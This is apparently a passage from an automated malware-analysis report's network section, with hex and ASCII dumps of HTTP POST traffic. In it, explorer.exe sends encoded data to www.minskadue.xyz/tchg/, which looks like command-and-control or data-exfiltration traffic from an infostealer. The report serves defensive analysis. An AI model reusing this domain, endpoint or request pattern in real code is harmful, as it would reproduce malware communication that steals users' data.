63 62 52 77 62 4e 46 62 62 52 30 49 6b 64 48 5f 59 7a 30 73 62 43 34 62 35 68 57 36 4f 78 57 47 36 48 69 6a 45 44 45 38 43 50 6e 6e 47 39 32 5a 77 42 30 4b 7a 65 4c 48 62 31 36 75 4d 70 35 6e 31 30 50 37 44 34 34 50 7e 30 52 6d 6b 35 69 45 73 6d 45 59 7a 6d 54 4a 7e 69 6d 64 33 66 41 5a 5a 6e 41 6d 55 37 76 59 6e 77 69 78 52 62 64 38 39 39 69 64 42 73 48 33 56 45 75 64 34 46 75 46 4e 68 4d 56 53 6b 37 67 36 6e 38 78 67 62 47 44 55 64 7a 39 65 37 38 75 49 64 64 56 76 6f 51 77 74 34 52 75 46 38 72 73 62 4a 71 4b 31 6c 50 62 64 58 32 56 74 45 51 4e 79 33 70 35 7a 41 7a 7a 67 32 38 33 49 74 78 6e 76 76 59 65 34 6a 72 61 67 2d 34 54 70 53 47 62 6f 59 56 72 28 77 73 64 62 76 6a 6f 62 6f 39 73 64 44 4d 73 43 74 46 73 63 58 74 78 64 33 64 51 52 63 49 31 72 4c 62 56 64 67 51 47 6e 34 77 47 41 71 37 46 4a 4e 6c 35 45 63 53 41 49 79 35 56 4b 6a 4f 48 66 72 78 6c 54 68 52 74 6b 33 63 54 61 6a 70 45 77 36 63 45 43 4d 46 41 52 4a 6a 44 54 62 69 54 56 72 78 69 74 63 47 2d 55 6e 58 68 48 4d 4d 47 36 36 4d 78 62 63 57 53 69 79 35 57 42 79 67 34 61 41 5a 6e 70 53 43 72 4e 69 63 39 5a 6c 31 33 72 4f 35 31 63 4e 28 59 42 57 6b 41 68 34 4e 65 31 50 36 50 76 62 78 6b 30 5a 52 59 67 76 35 37 78 61 34 43 45 6e 32 5f 73 4b 4c 67 54 37 79 30 66 45 45 2d 69 56 62 43 33 4f 28 34 66 7a 68 37 75 42 4f 4a 59 64 6d 6a 4e 42 59 5f 68 47 45 65 57 6c 43 76 57 75 47 51 61 62 51 57 7e 4e 7a 4d 28 47 4e 57 6c 64 33 64 5a 46 77 71 6c 65 30 59 45 67 4d 43 6b 53 6c 76 32 39 71 69 73 47 38 72 58 6f 42 44 4b 46 48 33 4a 6f 53 4d 48 49 7a 65 38 52 55 63 62 67 5a 6d 47 73 54 45 58 6c 32 37 52 39 4e 41 52 54 44 30 4e 37 4a 50 54 39 46 5f 46 74 66 31 56 31 43 45 6b 50 70 6b 41 4a 66 34 28 44 38 43 57 5f 68 4f 79 6c 76 75 75 7a 65 35 68 2d 70 54 52 4b 33 53 38 62 31 35 61 32 28 41 71 69 6d 61 32 30 7e 56 45 76 48 52 50 44 76 4e 7a 6e 56 54 4d 71 79 50 4b 33 75 56 6e 47 44 50 65 53 78 38 70 30 53 4f 5a 73 4b 6f 59 36 70 66 39 53 50 62 55 71 28 38 31 7a 7e 39 4e 33 30 77 7e 73 4a 34 61 68 33 63 46 49 6a 62 46 38 43 41 42 68 68 65 5a 70 61 6d 57 68 75 30 55 31 57 6d 28 65 6c 31 6b 69 4d 4f 41 71 30 46 4d 73 74 59 42 66 52 6f 48 43 73 48 38 2d 67 65 50 55 45 6f 72 4a 56 6c 52 41 54 4d 6f 7a 43 48 53 4d 51 36 45 35 66 4b 36 66 32 6b 55 37 6d 62 70 7a 4f 6a 54 36 77 37 57 50 30 67 7e 45 75 41 42 74 52 43 66 44 6b 72 61 33 64 46 44 33 52 41 46 72 78 38 70 78 4e 34 38 65 67 57 74 68 7a 67 4c 67 50 76 74 6d 45 57 4d 70 70 59 67 6e 35 35 62 37 74 36 65 44 57 54 57 4e 33 71 77 74 50 6c 37 43 75 7a 50 66 6e 6e 78 44 44 67 4e 5a 68 4a 57 53 42 70 75 6d 4c 47 48 73 76 6c 7e 6a 6b 52 69 57 47 77 31 6b 36 38 39 4c 72 4d 50 53 5a 32 50 65 45 67 37 4e 63 39 59 63 30 48 63 4f 6d 6b 65 5f 56 59 33 5a 58 4c 45 39 76 41 39 6d 67 30 58
                                                                                                                    Data Ascii: O0qEM=p0rXAvlhycf_GcSE~x1cOMTEHROIn6aG~1lhXPUN0jwVlA(iunWEoOBRYllLerOMglo4Da~zmafHZHgATH4TrZf7CQrHGj600gNfMleoKqJ9tt961d5AC8WrHSLQUviOIiJEsS0GSNhnk9s-4xFBxuEA8UCyF-nm6f7N1QC8KU4dq-v9IX3dU5Fee_uV150WPAIGB4E-eNO3fsZ4ZVNxAe7XF_yprhkPZ31wB3LcnDIpZAySCLBQhjWmtGcPY4OLlNIpUIv_W4G0nWBA6ba4OAyeNuJZMWYY8cvnFUL7GJpPG8jwmfzu3WBvY_MUfUMTdeTTHl2xXXaPyA0pdaJeVjXBxiTELvuAm-v70ufMlgX3TvaTLU81ppNURYbm~5Gz7eAaKDj8WxdY5pTDtsgajxO1jaA6NItn5BsC0IVrpdzBcY1ghAb_LJkOdSpTheSV2wjXcbRwbNFbbR0IkdH_Yz0sbC4b5hW6OxWG6HijEDE8CPnnG92ZwB0KzeLHb16uMp5n10P7D44P~0Rmk5iEsmEYzmTJ~imd3fAZZnAmU7vYnwixRbd899idBsH3VEud4FuFNhMVSk7g6n8xgbGDUdz9e78uIddVvoQwt4RuF8rsbJqK1lPbdX2VtEQNy3p5zAzzg283ItxnvvYe4jrag-4TpSGboYVr(wsdbvjobo9sdDMsCtFscXtxd3dQRcI1rLbVdgQGn4wGAq7FJNl5EcSAIy5VKjOHfrxlThRtk3cTajpEw6cECMFARJjDTbiTVrxitcG-UnXhHMMG66MxbcWSiy5WByg4aAZnpSCrNic9Zl13rO51cN(YBWkAh4Ne1P6Pvbxk0ZRYgv57xa4CEn2_sKLgT7y0fEE-iVbC3O(4fzh7uBOJYdmjNBY_hGEeWlCvWuGQabQW~NzM(GNWld3dZFwqle0YEgMCkSlv29qisG8rXoBDKFH3JoSMHIze8RUcbgZmGsTEXl27R9NARTD0N7JPT9F_Ftf1V1CEkPpkAJf4(D8CW_hOylvuuze5h-pTRK3S8b15a2(Aqima20~VEvHRPDvNznVTMqyPK3uVnGDPeSx8p0SOZsKoY6pf9SPbUq(81z~9N30w~sJ4ah3cFIjbF8CABhheZpamWhu0U1Wm(el1kiMOAq0FMstYBfRoHCsH8-gePUEorJVlRATMozCHSMQ6E5fK6f2kU7mbpzOjT6w7WP0g~EuABtRCfDkra3dFD3RAFrx8pxN48egWthzgLgPvtmEWMppYgn55b7t6eDWTWN3qwtPl7CuzPfnnxDDgNZhJWSBpumLGHsvl~jkRiWGw1k689LrMPSZ2PeEg7Nc9Yc0HcOmke_VY3ZXLE9vA9mg0XRzE2wzZnFNP7AykUGWKxwAeKAW7rgb2DJdPLYCDKM(HtCwW7tshPdtBYYaNZVAhLQe9W-SReJJEiykwdKYBewSKa_TbA0UrGyqu5Lv-Zy6VOiRWzA(z6ink1sTq4-ajjyNSgdQ8mmYrawPrXTt1VIL_0QzfqBjGfzOJ0SaxjtwWJeUW0wUDZVr_MIUj585lwBY8kZcXi89uAr~Pc7YyhMeLkxtnu3kpVFPSmNnMDl5nLLCNH-QfytfuhvBCIImuDfD_VZr_(6tWxIFlpsjDHBTDWpS0eO2ghQJkxoPl(CycL-YnAFlCtEEpmHIEtWlxlc~StyWV0q(cjtJ0iLcYP5xptlNczF8VaoHgPG1A2mU3Rpe18_rJ2GhkeWfeREAGf-0WIMCxiESgeQYgR1rJ6wvlLbZ6hRieSmzEbYNt9Fy9un6AbUEY(qsMCk7JcKL9q2l8~MQj1U5aJMyKnRCdgxEdRS5Axw9O3g2A3AJJn6ZqNpMiO9N1wM64kg7un_yMQMcamivha3pGLJPzjz0wEeAR4RE3tNJKlaXemMLEoq~-EpdP1ljeaVAfOg2kl7R-VZA4d6RQ4vywBL4u3TXTeukk2ukcHLV0RIilFXHMwrl31oJLt5GBLw8DTD3ng40lWugOSQTN~xwb0_Foc38IJw4y4HL2mhEZ8pPfqLa90y7AfTsGSe3rwOiklRfBth6B1wvuUm8kvt(vXeA_l2ayG3Jj~9ovu7eGSPZEL3rt8Ja3DC8x4FdRzHOvk2VikDoG9U8Jtvs7h_biM5OqNNec14fSJT5W7mqjmL(fCdSTAdEYgCXNaSyQjiH9dL7I3GmX82DUCRLrCDQL7HnEOU6PJmhMTK0A8clL7bbC4qa0CKEsf_dXn7aBuUEWVzsDEZ9fwPDmw4unkxpT2ZMgnJFOERkLq1SoB6SCccVHCyX6m3revQFZsF06ZkBzgZ2q~ZLFhDBHfU65rfFkzZVFoXo5Y4GU8AeuNhYWfrAb~NhxT3l4t6FzRh7c~h34r-acCpUZcqtDv4kSxPuu~NcbEjmor_fr5g67raNlEgSxCtjNC1vr5G0GhgF2fKzET2Z9xwJQoPJcJnfPQDeUpnox9XmmDh~ncq5LO94tCeL5aDz92sKgacGWCaIC(ruu(m4jfKs_5YPBJhLdgxbYqbiNtSnfTJ9AsGOSpSLx0Jcj2PGNLrfnFMuPjwL7IliazRCWf15gBxBAY296KtebTLEEHKnxVKtjs0Hh1oVFAMDHJRyCfEh3kKIyh0W0wpBLjUK8M0zY78k4ewLqYB63fBFvTEzEFS84C1tNha5Kez0Z~Ry5kTwchdHdn3ZtumSwrdSnLU9oV4DlxlGVt7DVmgtBDpmHwwwsaAAS4p5mTlW7uplUSa2ZElC13RIE6clYDMCYiHNLeJxApvAEB_HdI77ypwWcA11Pw6adKbPp857SBAAC67uNjgxWnByn~xRyDycRZ8k85rmGai1jC4E9lAlRVmMPW3mpM0TeVY~s~VrfDO97Ge1PNR9djB2O0jnf68DauFtiqBWI3EJsDNFOkU98F4pB4h8SEBeIZOdnOORZm1MSNTYDvsBDtBLCwCey5yBffR7Mp52Ts05vMqZSSful1qO_ebdZO1AyScFPOz0EyNO_GbQCLEtN5mItr8l8Wi~RB7eVzmzQB4jF4L0D4vOP8Gb_MXND4WSqzeXYBYfftWwbZEKfZManB8WbCpYyoHT8x_fWjYdBCUufokHUTXOTNj9PnNdeS8(lWZCbbsjatZbCWjtsDNGKIzjl79fsoKbM4nlNcrpcXRrji8OWWx6X0iwr~ZhkNPZfLFhDZc2Zu9jYDFiRFPl_VSiMO8TnvDPDmxQjzqgXZ3PwxrqVRxcKnxHlrLeNCJuHSTPf42mmqipNB3W1CkzrHhmInUU3KQ(Ad7POv8ehszppAuUP54dsIRArQctj~7lU62Z2fEr-D_TPgo(JAnGt~z(lS7teycVaQHv7(mF5UvJqHhCRa9vXckhZw3MDM0fdybBncOGgUJ1DgJGXpfIvq7mpBtTtZY(ksWnV6uytpqu6HlozL12iPHeLyL3X573no9Zu1ekJwnXLhrDLOohCu6osSK9Nt9P_m94SnJVKrqUOGeGrrqAItn6C7MoBiZt3KKin0aoXrLsxhPwI3Bt8Opsp0Izl3FDzyz4ItPShpQUFT9VR3Eqtjrv5HLAbOJ(jZq4s2H(l(abjRdC37NTUIc9gV2EbR4z0RPZ6jT~KKm0YTjy0L0wmjJa-syZBf8b2f103Ag52CIDeMP26yv6OtrA2085Ep1Nk8fPCF9JIV3AAvAhznbaVvAVryMBk68IoSqMVRIkjtqGoNrm2jEqWocZRHRGOONcy8azTl_tffMYIWGpnHMyeQAFWm8IMd8Ws6y3TZwE5XVLguPXgnlcD~JljurrEKtRRsLCyG9lk(8bEwBZqSIhPZUGWb8MRfAFIr5~No75ZlTZXu4Cy7lVKMU6SPxUA88k7dKytFY04IO9OJ-x_~8KpA6PJajVrO0seRI7yARiA3lth3dwpSzFM08K1TGFk~bcaXTVSshbn~2vI4iCU1xS4~ita8jS2rVSkv7hyBVh3c_8WrBUlbZJ8iJ9LTu(Le6DBsUXi17v6fCuRu0zCjnR7YLavAQHWzv3t8vEAHwg2cy(O6TPFTm3jEBC9v4DqaoiF83gcoLnmrkrLuwJDo8d_zrpcguzoGAejhUgMo9hK
                                                                                                                    May 30, 2023 11:10:40.913249969 CEST1009OUTData Raw: 70 33 4c 4d 6a 75 65 64 44 73 6b 6d 33 57 32 44 6c 6c 32 47 53 47 31 49 6b 36 76 52 2d 63 77 76 49 6d 4e 6d 74 49 54 71 4e 31 6a 62 57 6f 44 6d 44 41 6e 59 4a 6a 6c 45 4c 39 74 34 63 75 36 28 6b 5a 73 52 4c 55 59 72 67 45 50 36 37 77 57 70 78 74
                                                                                                                    Data Ascii: p3LMjuedDskm3W2Dll2GSG1Ik6vR-cwvImNmtITqN1jbWoDmDAnYJjlEL9t4cu6(kZsRLUYrgEP67wWpxtIZY(7fivTr57LJdRJc6ptX-usjrdGbml8XhTISzD7qP3H8QIvXQ0rMv~mUdFF0bKi6tj_3xijbArFu7yeBsC370PPRbL_UQ3xiQ~BqR5O8DA1cvTiuy4naAF_bKvOldBbtDv5l5sDMglvi76x3fSMxMtvr3N1ZeKD
                                                                                                                    May 30, 2023 11:10:40.913418055 CEST1015OUTData Raw: 74 53 50 28 48 68 63 66 45 7e 31 73 4b 36 37 75 57 58 73 32 59 47 39 6b 73 4a 36 79 63 47 4a 65 46 6a 5a 67 5a 66 50 7e 31 57 4c 4b 7a 36 78 28 6f 45 76 34 6e 79 46 55 64 5a 4e 66 48 66 32 33 50 43 67 73 4f 53 76 4b 65 6d 6c 28 75 75 73 51 79 54
                                                                                                                    Data Ascii: tSP(HhcfE~1sK67uWXs2YG9ksJ6ycGJeFjZgZfP~1WLKz6x(oEv4nyFUdZNfHf23PCgsOSvKeml(uusQyTcSksPnJUbXUVwkBeIsNkV5d5wLc86T_hMcJbip7olc4TUO-Bp2HCkE7opwA28JJ~8P-4R8uD3UvfHCGD0BUUCdIh7iJGnoIG8qwuvmlrBjS9hOv(DjVB5wvP7ZJBg~mWtFGYEMoQuJIqqvKNpULe1Kww6XbINuMX7
                                                                                                                    May 30, 2023 11:10:40.913624048 CEST1024OUTData Raw: 69 66 64 61 44 69 6f 6f 65 6d 58 37 31 66 37 6b 70 7e 4d 6f 66 31 5f 51 59 6d 71 55 54 4a 7a 47 55 41 44 38 6f 67 4b 71 4a 75 50 36 63 72 4e 4b 48 47 71 30 33 53 65 73 38 6b 76 65 50 59 4c 42 52 32 4e 44 67 55 5a 4c 4a 7e 44 36 67 4f 34 77 68 57
                                                                                                                    Data Ascii: ifdaDiooemX71f7kp~Mof1_QYmqUTJzGUAD8ogKqJuP6crNKHGq03Ses8kvePYLBR2NDgUZLJ~D6gO4whWyGUoR1rzWejs82zHR9hgx3CAbBds1gO9WS0KEE4PeueeHBbDVxzEuO-~acr~APvp6XBAJIHu_fDjLKR8OGaYjduDF(Q1xe1rVQMWeh6nwunkK5S(xxATPgorZ(L2H5KkwHVBb~4hZ50hwc07rYKujXY0XallxJR2B
                                                                                                                    May 30, 2023 11:10:40.913886070 CEST1026OUTData Raw: 59 36 78 7a 77 4d 74 41 55 45 37 45 57 74 5a 37 5f 4a 72 75 4a 73 68 41 6f 4d 61 63 71 70 4e 4d 37 72 4d 73 44 6a 36 28 35 7a 56 76 2d 62 33 64 73 28 69 74 4a 55 66 43 47 38 35 56 69 7e 5f 68 55 39 6b 45 4e 73 6b 7e 44 41 6a 68 51 66 6a 63 31 66
                                                                                                                    Data Ascii: Y6xzwMtAUE7EWtZ7_JruJshAoMacqpNM7rMsDj6(5zVv-b3ds(itJUfCG85Vi~_hU9kENsk~DAjhQfjc1fY6uHcrsXZ2nG8v2S2q135VsliAq04Ptj4Gx~aCX4fhOqUehstCl3uKT8HeURyTKMOU3qObulgq8Ob9ZqcaMYKV_Y6p0OLoLOKiWs9W-38hME0ReGJZ_s9go3wKCPFwSaP8LYir8Rrwi(4E-feK2RQSJnneolZA00t
                                                                                                                    May 30, 2023 11:10:40.914104939 CEST1031OUTData Raw: 35 53 4f 75 72 4c 61 4c 6b 4b 55 6e 41 78 4c 44 53 28 58 62 64 33 5f 33 38 7e 7a 7e 74 67 37 59 36 69 72 6d 44 78 56 79 6f 4f 76 37 36 4f 44 35 74 76 6c 4d 4e 28 50 32 43 32 70 50 51 6f 6f 4d 78 4b 56 47 5f 43 35 6a 64 61 47 37 74 6a 5f 32 70 37
                                                                                                                    Data Ascii: 5SOurLaLkKUnAxLDS(Xbd3_38~z~tg7Y6irmDxVyoOv76OD5tvlMN(P2C2pPQooMxKVG_C5jdaG7tj_2p7PFWrM(WT-rs5vMMrdjAAaQ-SPT_K55GSMg3JZI_VYOh~ddwfCE0o_KdXXvpnCMZR4zm(sEg2ZBap1TauHJaS88Thzlyra~uUluOpNekAURlw2R8(vEPWSlfUk3LXPumfvFhRpZnTK9uCOPtbxivw1Ci4yYrhfQdsX
                                                                                                                    May 30, 2023 11:10:40.915285110 CEST1032INHTTP/1.1 405 Not Allowed
                                                                                                                    Date: Tue, 30 May 2023 09:10:40 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 150
                                                                                                                    Connection: close
                                                                                                                    Server: UD Forwarding 3.1
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                                                                                    May 30, 2023 11:10:40.924773932 CEST1038OUTData Raw: 34 71 69 73 76 42 4d 44 67 39 4e 30 76 32 72 36 37 6b 67 68 71 4a 64 47 49 68 6e 70 39 4f 74 7e 58 46 6a 4c 67 4a 49 61 53 76 63 4d 63 6a 73 37 63 38 36 70 4a 55 71 63 43 49 73 6f 4f 37 44 5a 58 74 59 78 4f 28 41 7a 51 6c 4d 30 72 48 47 58 67 62
                                                                                                                    Data Ascii: 4qisvBMDg9N0v2r67kghqJdGIhnp9Ot~XFjLgJIaSvcMcjs7c86pJUqcCIsoO7DZXtYxO(AzQlM0rHGXgblGLbDolrutuUxGZRyoVeRB2hCsxFCRhIWD6n3zCTTR7z-HApm4ISKSCOjfQp5~PoZSCVBflhwGPtdALv6yWGmglwTmR~Yxn~9c7RIiYyMpO~flWgplwBsxLr96e9wepL2CkwrOrR1S-UZ1RdbLfIJfnylInzzlTMZ
                                                                                                                    May 30, 2023 11:10:40.924961090 CEST1045OUTData Raw: 6d 62 54 41 6a 44 69 43 37 6a 65 6c 67 72 56 4d 4a 56 7a 71 6c 33 58 6c 6f 63 6f 6e 39 67 49 43 64 59 63 54 6b 37 6a 56 30 4e 7a 61 4c 54 49 68 34 6c 43 42 56 5a 2d 69 49 45 78 38 6d 64 64 75 53 6d 37 64 56 68 38 46 5f 6b 32 41 69 47 66 4a 32 44
                                                                                                                    Data Ascii: mbTAjDiC7jelgrVMJVzql3Xlocon9gICdYcTk7jV0NzaLTIh4lCBVZ-iIEx8mdduSm7dVh8F_k2AiGfJ2DMaXCSr5KONTnxP0bqNtCCXEx5inOv62(A~C8Ao8Jr~wTSDih7Ymt-oi7GRdNpRee_zXsYYnSTieZ8hmgExf7fRpcpF98-4F(1nfQKob5PJZloyRDWLD95rz2IhX4OmvhWWkYRRbaubwwSwukicemn9vkAonkFVaD6


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    5192.168.11.2049764109.123.121.24380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:08:14.128957033 CEST293OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.minskadue.xyz
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 51815
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.minskadue.xyz
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.minskadue.xyz/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 4f 4c 48 71 66 47 78 6c 45 7a 4a 70 4a 66 36 71 42 64 64 50 7e 53 4a 6f 35 7a 59 50 50 59 78 42 54 70 4b 48 38 73 4b 57 73 2d 6e 6c 4b 38 65 38 6b 41 58 51 4f 5a 33 76 33 36 38 7a 38 6c 56 5f 37 37 76 30 6d 6d 65 67 30 66 54 56 32 6c 6d 48 54 36 45 49 37 67 7e 34 42 61 72 33 42 59 63 6c 55 63 57 5a 72 6d 31 6e 54 52 42 55 56 53 30 65 75 69 79 53 4c 56 55 32 45 57 56 4f 7e 38 42 79 64 51 4a 6e 67 64 48 65 4a 6a 57 30 76 6f 41 33 71 74 33 69 34 4c 64 51 4c 72 32 43 73 59 61 66 51 7a 52 66 4a 59 4c 64 4a 58 6b 69 6b 6a 51 34 48 67 6e 4c 68 41 66 79 32 56 54 38 6a 4b 4b 4a 4d 6a 56 69 31 35 75 6d 75 57 39 62 52 5f 78 5a 62 4c 34 50 42 50 69 63 47 62 4c 74 4c 31 41 48 46 63 50 4d 6e 77 48 52 51 4e 34 44 78 61 31 44 75 47 32 5f 4b 7a 7a 50 73 65 42 4d 76 4a 45 5a 4b 58 74 79 31 4b 6e 31 70 31 6d 33 7e 42 58 62 34 62 66 58 4a 51 4f 47 4c 32 69 59 48 38 48 52 6e 6c 4a 55 47 73 33 66 71 6e 7e 6d 7e 67 52 49 43 7a 41 39 63 32 70 61 45 67 30 58 42 57 72 5f 48 53 7a 54 74 6a 37 6b 53 46 36 36 58 75 59 68 65 75 7a 5a 52 53 34 73 63 78 7e 66 68 5f 52 4c 37 6e 4a 59 76 30 34 61 64 34 31 4c 51 44 4a 42 55 2d 32 4e 50 33 4d 4f 62 54 54 5f 56 44 74 41 30 57 28 79 51 4c 78 61 4f 5a 49 59 43 7a 77 77 58 32 36 77 46 6c 6e 67 37 69 5a 4e 79 46 6e 4e 65 6c 33 46 70 76 61 79 30 53 28 32 36 52 4f 45 63 63 55 76 67 39 72 73 45 33 33 73 4d 66 7e 4a 33 78 59 51 59 33 67 4c 72 4f 79 35 62 59 62 4e 30 63 64 79 32 71 52 66 79 45 67 58 48 32 4c 34 48 38 37 5a 32 4d 73 6f 68 2d 49 38 56 7a 59 72 54 48 6f 6c 41 39 73 72 42 51 5a 62 5a 50 4e 2d 57 41 52 50 73 30 61 7a 33 4d 4f 42 4f 54 41 79 76 39 37 73 36 41 4f 6c 75 4f 36 5a 66 34 6b 39 42 61 6e 4f 55 53 4d 61 52 57 72 64 74 63 4d 68 42 49 7a 52 39 4a 66 41 30 46 74 34 32 78 53 74 7e 4b 38 5f 33 4f 32 32 58 57 54 4d 39 75 46 6c 73 35 64 57 79 33 64 62 53 37 58 78 57 2d 7a 2d 44 4c 72 44 49 7a 74 44 32 64 68 49 6a 4b 68 43 39 56 54 5a 71 43 71 6a 5a 69 4a 6f 67 34 58 75 68 50 77 76 68 47 53 31 65 65 53 6b 77 31 49 44 6f 68 6c 45 78 58 71 43 48 79 73 4d 55 6b 71 39 47 42 36 4d 62 35 76 6d 4f 33 4c 58 75 6b 42 75 37 2d 77 61 6f 6d 44 6a 36 41 34 4b 50 6e 4b 5f 4e 64 6f 62 33 41 62 6c 6f 67 28 6d 4d 4a 67 4c 28 71 5a 6a 56 6a 4b 41 4f 34 42 76 62 33 49 4e 7e 5f 54 4c 73 48 61 4b 4e 58 57 7a 52 69 7e 64 44 77 6a 44 67 44 64 37 73 30 59 6e 6a 52 59 68 46 43 7e 48 76 45 72 77 56 47 43 74 6e 71 4d 71 6d 71 48 79 78 30 42 57 30 66 4a 53 61 57 72 64 62 51 4a 4c 28 68 4d 37 6d 34 4a 32 4d 35 37 6a 48 53 54 59 72 47 55 76 33 32 38 57 73 34 4d 70 73 34 61 6c 54 62 64 57 78 6f 36 39 45 50 43 65 4f 59 69 78 37 34 54 4d 75 32 5a 68 74 6d 67 38 45 39 61 6e 55 79 65 50 59 47 6a 5a 62 71 41 4a 51 33 56 43 6c 32 49 34 32 73 48 43 6a 39 45 75 53 70 5a 61 56 46 56 62 6f 43 59 52 52 52 6d 6d 70 6b 39 74 66 33 49 36 39 43 6e 4c 78 41 4c 54 64 34 4d 36 76 68 74 59 28 46 62 61 63 34 63 6e 4c 49 49 67 33 55 63 33 78 6e 63 62 37 75 4e 57 5a 6b 32 48 6a 33 43 67 4f 48 4e 49 49 72 54 6d 57 39 58 2d 71 5a 38 44 7a 50 67 57 79 62 67 59 53 32 67 6d 73 73 33 43 51 41 55 42 66 36 68 58 73 79 31 56 48 4f 54 55 4e 77 69 35 56 38 76 66 7e 79 78 44 6e 48 52 63 6a 58 61 55 53 30 37 61 4b 74 39 69 35 4f 33 71 6d 59 38 6b 4c 56 4e 56 7a 2d 6a 31 70 4b 78 32 4b 61 7e 46 64 44 77 66 58 34 57 61 4d 2d 28 51 33 43 4c 31 48 5f 6d 54 31 4c 67 34 57 35 31 79 47 68 66 6d 37 4a 5a 56 28 4f 49 75 48 77 62 7a 78 77 4e 72 75 77 38 30 46 6e 70 6d 59 32 53 77 30 54 42 68 49 50 38 38 31 6c 46 79 73 6f 45 48 46 64 31 65 44 61 6f 31 41 6f 4f 4c 4b 4a 57 2d 6d 6f 51 73 28 50 62 46 76 49 72 6b 4e 35 42 57 64 71 69 66 7e 33 4e 47 78 49 71 6f 31 33 37 4c 56 58 32 6a 4a 74 62 4b 57 69 45 7a 33 52 48 43 65 4c 4f 39 76 65 61 74 69 72 73 64 6d 65 6a 76 32 44 49 46 41 53 42 7a 4e 67 45 7a 42 45 66 33 52 41 30 6a 67 69 6e 65 36 55 50 76 50 5f 77 45 4f 6b 37 36 6e 74 73 35 55 36 4e 59 42 58 6b 63 39 2d 33 43 6d 73 7a 48 52 30 31 5f 49 63 7a 55 41 43 4c 64 42 49 28 77 6c 75 4f 5a 59 5f 50 2d 32 4a 70 67 77 67 31 42 4a 6a 7a 36 71 42 34 51 38 5f 71 65 75 78 6d 69 34 33 4e 49 68 78 7e 42 6e 5a 42 51 41 57 4d 6c 39 4d 61 69 28 61 63 50 50 6a 4d 4a 68
                                                                                                                    Data Ascii: O0qEM=OLHqfGxlEzJpJf6qBddP~SJo5zYPPYxBTpKH8sKWs-nlK8e8kAXQOZ3v368z8lV_77v0mmeg0fTV2lmHT6EI7g~4Bar3BYclUcWZrm1nTRBUVS0euiySLVU2EWVO~8BydQJngdHeJjW0voA3qt3i4LdQLr2CsYafQzRfJYLdJXkikjQ4HgnLhAfy2VT8jKKJMjVi15umuW9bR_xZbL4PBPicGbLtL1AHFcPMnwHRQN4Dxa1DuG2_KzzPseBMvJEZKXty1Kn1p1m3~BXb4bfXJQOGL2iYH8HRnlJUGs3fqn~m~gRICzA9c2paEg0XBWr_HSzTtj7kSF66XuYheuzZRS4scx~fh_RL7nJYv04ad41LQDJBU-2NP3MObTT_VDtA0W(yQLxaOZIYCzwwX26wFlng7iZNyFnNel3Fpvay0S(26ROEccUvg9rsE33sMf~J3xYQY3gLrOy5bYbN0cdy2qRfyEgXH2L4H87Z2Msoh-I8VzYrTHolA9srBQZbZPN-WARPs0az3MOBOTAyv97s6AOluO6Zf4k9BanOUSMaRWrdtcMhBIzR9JfA0Ft42xSt~K8_3O22XWTM9uFls5dWy3dbS7XxW-z-DLrDIztD2dhIjKhC9VTZqCqjZiJog4XuhPwvhGS1eeSkw1IDohlExXqCHysMUkq9GB6Mb5vmO3LXukBu7-waomDj6A4KPnK_Ndob3Ablog(mMJgL(qZjVjKAO4Bvb3IN~_TLsHaKNXWzRi~dDwjDgDd7s0YnjRYhFC~HvErwVGCtnqMqmqHyx0BW0fJSaWrdbQJL(hM7m4J2M57jHSTYrGUv328Ws4Mps4alTbdWxo69EPCeOYix74TMu2Zhtmg8E9anUyePYGjZbqAJQ3VCl2I42sHCj9EuSpZaVFVboCYRRRmmpk9tf3I69CnLxALTd4M6vhtY(Fbac4cnLIIg3Uc3xncb7uNWZk2Hj3CgOHNIIrTmW9X-qZ8DzPgWybgYS2gmss3CQAUBf6hXsy1VHOTUNwi5V8vf~yxDnHRcjXaUS07aKt9i5O3qmY8kLVNVz-j1pKx2Ka~FdDwfX4WaM-(Q3CL1H_mT1Lg4W51yGhfm7JZV(OIuHwbzxwNruw80FnpmY2Sw0TBhIP881lFysoEHFd1eDao1AoOLKJW-moQs(PbFvIrkN5BWdqif~3NGxIqo137LVX2jJtbKWiEz3RHCeLO9veatirsdmejv2DIFASBzNgEzBEf3RA0jgine6UPvP_wEOk76nts5U6NYBXkc9-3CmszHR01_IczUACLdBI(wluOZY_P-2Jpgwg1BJjz6qB4Q8_qeuxmi43NIhx~BnZBQAWMl9Mai(acPPjMJhBZOQb6u6Seu(UL_SkgjnusKKwDBmCIOc2WkDEd8HfusYQW7MJCG5eJDnGB3gBxK5ANkMaLQMEoi5j0GYBfoO5mDoOqchm(ckkXIwHZGPS1Yi_2P1Khzt-wIfnbJuxQA(A2W9fDv2WgfVl3nlIyteB2Po-tY4_Bg2BpeHiXQyhyGpu4hFDLzfa6jkg5pR-ETj4FB0JVcXM5oPVF8ZXIv(e53waYf0mN3V8IDxijdcfCgCaCDmQjItWHeTmGOW0PaCFD6BEYGWJ4V6nEHoQVbhhV_YrFcpcfmhMP48WypWvvZakcH0wbh3zo2pezgjv